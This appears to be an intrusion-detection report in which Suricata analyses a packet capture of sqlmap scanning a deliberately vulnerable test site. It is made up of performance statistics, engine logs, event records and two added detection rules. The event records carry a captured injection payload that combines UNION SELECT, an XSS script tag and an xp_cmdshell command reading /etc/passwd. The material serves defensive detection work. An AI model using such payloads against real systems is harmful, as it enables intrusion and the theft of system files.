Filename: sqlmap.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 10.7183599472 seconds
Hash: c8027fddb943c33d197316babb1cbf5e
Uploaded: 1542363560

Logfiles


packet_stats.log (8743 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          1472           446147      349292125     221339100        325.8b  100.00
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          1472            66755       19486087        293776        432.4m   97.41
TMM_RECEIVEPCAPFILE         IPv4       6          1470             2537         160946          4629          6.8m    1.53
TMM_DECODEPCAPFILE          IPv4       6          1470             2661          62597          3200          4.7m    1.06

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          1470             2763         405147          4303          6.3m  1.77  
stream                  IPv4       6          1472             2553         527406         20030         29.5m  8.25  
detect                  IPv4       6          1472            44535       19448572        214976        316.4m  88.53 
tcp-prune               IPv4       6          1472             2519         156155          3518          5.2m  1.45  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6           126             3460          19745          5136        647.2k  100.00
Proto detect            IPv4       6             4             2901          31671         11620         46.5k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_JSON_HTTP            IPv4       6           126            41929       13446751        183870         23.2m  65.67 
LOGGER_JSON_FILE            IPv4       6           125            54596         393947         96910         12.1m  34.33 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           711             2578        6751067         28846        20.5m  22.30 
stream                            IPv4       6           711             2554         576898         29084        20.7m  22.48 
http_uri                          IPv4       6           126             6660          67623         17264         2.2m  2.36  
http_request_line                 IPv4       6           126             3470          54774          5841       736.1k  0.80  
http_client_body                  IPv4       6           126             2709          18760          3251       409.6k  0.45  
http_header (request)             IPv4       6           126            10169         262787         22480         2.8m  3.08  
http_header (request trailer)     IPv4       6           126             2575          19012          3086       388.9k  0.42  
http_header_names (request)       IPv4       6           126             5809          68362         11229         1.4m  1.54  
http_accept (request)             IPv4       6           126             2852           9345          3415       430.3k  0.47  
http_referer (request)            IPv4       6           126             2849          38953          4023       506.9k  0.55  
http_content_len (request)        IPv4       6           126             2859          32941          3541       446.2k  0.49  
http_content_type (request)       IPv4       6           126             2790         464371          6940       874.5k  0.95  
http_start (request)              IPv4       6           126             5428          50877          8679         1.1m  1.19  
http_raw_header (request)         IPv4       6           126             7523          68969         10028         1.3m  1.37  
http_method                       IPv4       6           126             2734          30566          3501       441.2k  0.48  
http_cookie (request)             IPv4       6           126             2852          21219          4251       535.7k  0.58  
http_raw_uri                      IPv4       6           126             3061          21993          5234       659.5k  0.72  
http_user_agent                   IPv4       6           126             4949        5454287         51275         6.5m  7.02  
http_host                         IPv4       6           126             3317          43327          5032       634.1k  0.69  
http_response_line                IPv4       6           125             3221          53745          5237       654.6k  0.71  
http_header (response)            IPv4       6           125             7780          65562         16850         2.1m  2.29  
http_header (response trailer)    IPv4       6           125             2587           4922          2796       349.6k  0.38  
http_content_type (response)      IPv4       6           125             2864          38564          3809       476.1k  0.52  
http_raw_header (response)        IPv4       6           333             3713          66308          6496         2.2m  2.35  
http_cookie (response)            IPv4       6           125             2909          46353          5207       650.9k  0.71  
http_stat_code                    IPv4       6           125             2793           6137          3232       404.1k  0.44  
file_data (http response)         IPv4       6           333             2573        7375454         68125        22.7m  24.66 
Total                             IPv4                  4980                                         18470        92.0m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           260             3359          70295         19039          5.0m  1.15  
PROF_DETECT_RULES           IPv4       6          1472             2529        8733159         55884         82.3m  19.11 
PROF_DETECT_STATEFUL_START    IPv4       6           573             5096         529203         28144         16.1m  3.75  
PROF_DETECT_STATEFUL_CONT    IPv4       6          1472             2512         402180          5974          8.8m  2.04  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           944             2560          50842          3147          3.0m  0.69  
PROF_DETECT_PREFILTER       IPv4       6          1472             7808       19388813        106204        156.3m  36.31 
PROF_DETECT_PF_PAYLOAD      IPv4       6           711            18983       19343603         93891         66.8m  15.51 
PROF_DETECT_PF_TX           IPv4       6           944             2542        7418802         69467         65.6m  15.23 
PROF_DETECT_PF_SORT1        IPv4       6           517             2540          62939          3563          1.8m  0.43  
PROF_DETECT_PF_SORT2        IPv4       6          1472             2516          59568          3048          4.5m  1.04  
PROF_DETECT_NONMPMLIST      IPv4       6          1472             2523         129726          3473          5.1m  1.19  
PROF_DETECT_ALERT           IPv4       6          1472             2514          44996          3007          4.4m  1.03  
PROF_DETECT_CLEANUP         IPv4       6          1472             2514         394789          3454          5.1m  1.18  
PROF_DETECT_GETSGH          IPv4       6          1472             2527          82915          3921          5.8m  1.34  


suricata-report-2018-11-16-T-10-19-31-11162018.1019-sqlmap.pcap.txt (18281 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/c8027fddb943c33d197316babb1cbf5ed2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1019-sqlmap.pcap -vvv -k none
elapsedtime:9.694385
stderr:
stdout:
16/11/2018 -- 10:19:21 - <Info> - Configuration node 'rule-files' redefined.
16/11/2018 -- 10:19:21 - <Notice> - This is Suricata version 4.0.0 RELEASE
16/11/2018 -- 10:19:21 - <Info> - CPUs/cores online: 1
16/11/2018 -- 10:19:21 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32781 and 'request-body-inspect-window' set to 16380 after randomization.
16/11/2018 -- 10:19:21 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32009 and 'response-body-inspect-window' set to 15720 after randomization.
16/11/2018 -- 10:19:21 - <Config> - DNS request flood protection level: 500
16/11/2018 -- 10:19:21 - <Config> - DNS per flow memcap (state-memcap): 524288
16/11/2018 -- 10:19:21 - <Config> - DNS global memcap: 16777216
16/11/2018 -- 10:19:21 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
16/11/2018 -- 10:19:21 - <Config> - preallocated 1000 hosts of size 136
16/11/2018 -- 10:19:21 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
16/11/2018 -- 10:19:21 - <Config> - using magic-file /usr/share/file/magic
16/11/2018 -- 10:19:21 - <Config> - Core dump size is unlimited.
16/11/2018 -- 10:19:21 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
16/11/2018 -- 10:19:21 - <Config> - preallocated 1000 defrag trackers of size 168
16/11/2018 -- 10:19:21 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
16/11/2018 -- 10:19:21 - <Config> - stream "prealloc-sessions": 2048 (per thread)
16/11/2018 -- 10:19:21 - <Config> - stream "memcap": 33554432
16/11/2018 -- 10:19:21 - <Config> - stream "midstream" session pickups: disabled
16/11/2018 -- 10:19:21 - <Config> - stream "async-oneside": disabled
16/11/2018 -- 10:19:21 - <Config> - stream "checksum-validation": disabled
16/11/2018 -- 10:19:21 - <Config> - stream."inline": disabled
16/11/2018 -- 10:19:21 - <Config> - stream "bypass": disabled
16/11/2018 -- 10:19:21 - <Config> - stream "max-synack-queued": 5
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "memcap": 134217728
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "depth": 0
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "toserver-chunk-size": 2523
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "toclient-chunk-size": 2509
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly.raw: enabled
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "segment-prealloc": 2048
16/11/2018 -- 10:19:21 - <Config> - Delayed detect disabled
16/11/2018 -- 10:19:21 - <Config> - pattern matchers: MPM: ac, SPM: bm
16/11/2018 -- 10:19:21 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
16/11/2018 -- 10:19:21 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
16/11/2018 -- 10:19:21 - <Config> - prefilter engines: MPM
16/11/2018 -- 10:19:21 - <Config> - IP reputation disabled
16/11/2018 -- 10:19:21 - <Perf> - Registered 148 keyword profiling counters.
16/11/2018 -- 10:19:21 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
16/11/2018 -- 10:19:21 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
16/11/2018 -- 10:19:21 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
16/11/2018 -- 10:19:22 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
16/11/2018 -- 10:19:22 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
16/11/2018 -- 10:19:22 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
16/11/2018 -- 10:19:23 - <Config> - No rules loaded from ET-emerging-icmp.rules.
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
16/11/2018 -- 10:19:24 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
16/11/2018 -- 10:19:24 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
16/11/2018 -- 10:19:24 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
16/11/2018 -- 10:19:27 - <Config> - No rules loaded from local.rules.
16/11/2018 -- 10:19:27 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
16/11/2018 -- 10:19:27 - <Info> - Threshold config parsed: 0 rule(s) found
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tcp-packet
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tcp-stream
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for udp-packet
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for other-ip
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_uri
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_client_body
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_accept
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_accept_enc
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_accept_lang
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_referer
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_connection
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_method
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_uri
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_user_agent
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_host
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_host
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_stat_msg
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_stat_code
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for dns_query
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_sni
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_cert_issuer
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_cert_subject
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_cert_serial
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 10:19:27 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
16/11/2018 -- 10:19:27 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
16/11/2018 -- 10:19:27 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
16/11/2018 -- 10:19:27 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
16/11/2018 -- 10:19:27 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
16/11/2018 -- 10:19:27 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
16/11/2018 -- 10:19:27 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
16/11/2018 -- 10:19:27 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
16/11/2018 -- 10:19:28 - <Perf> - Unique rule groups: 111
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toserver TCP packet": 31
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toclient TCP packet": 20
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toserver TCP stream": 31
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toclient TCP stream": 21
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toserver UDP packet": 33
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toclient UDP packet": 15
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "other IP packet": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_uri": 8
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_request_line": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_client_body": 6
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_response_line": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_header": 6
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_header": 3
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_header_names": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_accept": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_referer": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_content_len": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_content_type": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_content_type": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_start": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_method": 3
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_cookie": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_cookie": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_host": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver dns_query": 4
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver tls_sni": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver file_data": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient file_data": 5
16/11/2018 -- 10:19:29 - <Perf> - Registered 18241 rule profiling counters.
16/11/2018 -- 10:19:29 - <Info> - fast output device (regular) initialized: alert
16/11/2018 -- 10:19:29 - <Info> - eve-log output device (regular) initialized: eve.json
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'alert'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'http'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'dns'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'tls'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'files'
16/11/2018 -- 1

This file has been truncated.
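The run above loaded local.rules and found it empty ("No rules loaded from local.rules."), so the only signatures in play were ET Open's. As an added example that is not part of this report, here is what a site-local rule file for the traffic in this capture looks like in Suricata 4.0 rule syntax. The user-agent string is the one recorded in eve.json; the sid values (chosen in the 1000000+ local range), the msg strings and the $HOME_NET/$EXTERNAL_NET direction (scanner 192.168.5.137 inside, target 5.175.17.140 outside, as in this pcap) are assumptions.

```suricata
# local.rules (added example, not from the report above)
# sids in the 1000000+ local range and the msg strings are assumptions.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL SCAN sqlmap User-Agent"; flow:established,to_server; content:"sqlmap/"; http_user_agent; nocase; classtype:web-application-attack; sid:1000001; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL WEB_ATTACK xp_cmdshell in HTTP URI"; flow:established,to_server; content:"xp_cmdshell"; http_uri; nocase; classtype:web-application-attack; sid:1000002; rev:1;)
```

Both patterns are plain ASCII in the captured requests (the user agent is sent unencoded and xp_cmdshell contains no percent-encoded characters), so they match whether or not the normalized URI buffer has been decoded; use http_raw_uri if you need to match a payload in the exact encoded form the client sent. The direction only works if HOME_NET covers 192.168.5.0/24 (the default suricata.yaml HOME_NET includes 192.168.0.0/16). To check the rules, rerun the lastcmd above with this file in place and look for the two sids in the fast-log alert output that the run initialized. ET Open ships its own sqlmap user-agent signature, so the local rule is mainly useful as a template for site-specific payloads.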


stats.log (2404 bytes)
------------------------------------------------------------------------------------
Date: 11/16/2018 -- 10:19:31 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 1470
decoder.bytes                              | Total                     | 846124
decoder.ipv4                               | Total                     | 1470
decoder.sll                                | Total                     | 1470
decoder.tcp                                | Total                     | 1470
decoder.avg_pkt_size                       | Total                     | 575
decoder.max_pkt_size                       | Total                     | 4412
flow.tcp                                   | Total                     | 130
tcp.sessions                               | Total                     | 129
tcp.syn                                    | Total                     | 129
tcp.synack                                 | Total                     | 129
tcp.rst                                    | Total                     | 3
detect.mpm_list                            | Total                     | 2
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 3
app_layer.flow.http                        | Total                     | 125
app_layer.tx.http                          | Total                     | 126
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 116
flow_mgr.flows_notimeout                   | Total                     | 116
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65420
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7111744


eve.json (166139 bytes)
{"timestamp":"2018-11-16T10:17:48.755530+0000","flow_id":781020899842446,"pcap_cnt":32,"event_type":"http","src_ip":"192.168.5.137","src_port":43750,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:48.778501+0000","flow_id":781020899842446,"pcap_cnt":36,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43750,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":15382},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":15382,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.070640+0000","flow_id":329048606386753,"pcap_cnt":53,"event_type":"http","src_ip":"192.168.5.137","src_port":43752,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1&oVIL=1267%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.093297+0000","flow_id":329048606386753,"pcap_cnt":55,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43752,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1&oVIL=1267%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16138},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":16138,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.763542+0000","flow_id":1509700756351997,"pcap_cnt":74,"event_type":"http","src_ip":"192.168.5.137","src_port":43754,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
